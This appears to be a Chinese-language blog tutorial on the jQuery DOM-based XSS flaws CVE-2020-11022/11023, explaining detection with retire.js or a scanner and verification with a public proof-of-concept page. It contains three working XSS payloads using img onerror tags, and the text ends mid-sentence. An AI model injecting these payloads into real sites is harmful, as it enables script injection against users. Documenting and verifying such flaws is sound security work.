jQuery导致的XSS跨站漏洞

漏洞详情:

在JQuery的诸多发行版本中,存在着DOM-based XSS(跨站脚本攻击的一种)漏洞,易被攻击者利用。漏洞原因在于过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞。

漏洞发现:

最简单方式,通过火狐浏览器的retire.js插件,访问目标网站发现。

jQuery导致的XSS跨站漏洞_第1张图片

jQuery导致的XSS跨站漏洞_第2张图片

或者通过扫描器,找到JQuery版本信息

jQuery导致的XSS跨站漏洞_第3张图片

漏洞验证:

漏洞发现者提供了JavaScript XSS Demo POC,使用POC验证漏洞情况




    
    jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)
    



jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)

PoCs of XSS bugs fixed in jQuery 3.5.0. You can find the details in my blog post: English / 日本語

PoC 1

<style><style /><img src=x onerror=alert(2)>

PoC 2 (Only jQuery 3.x affected)

<img alt="<x" title="/><img src=x onerror=alert("1st")>">

PoC 3

<option><style></option></select><img src=x onerror=alert("1st")></style>

点击POC1下的Append via .html,xss弹窗

jQuery导致的XSS跨站漏洞_第4张图片

F12查看源代码发现div下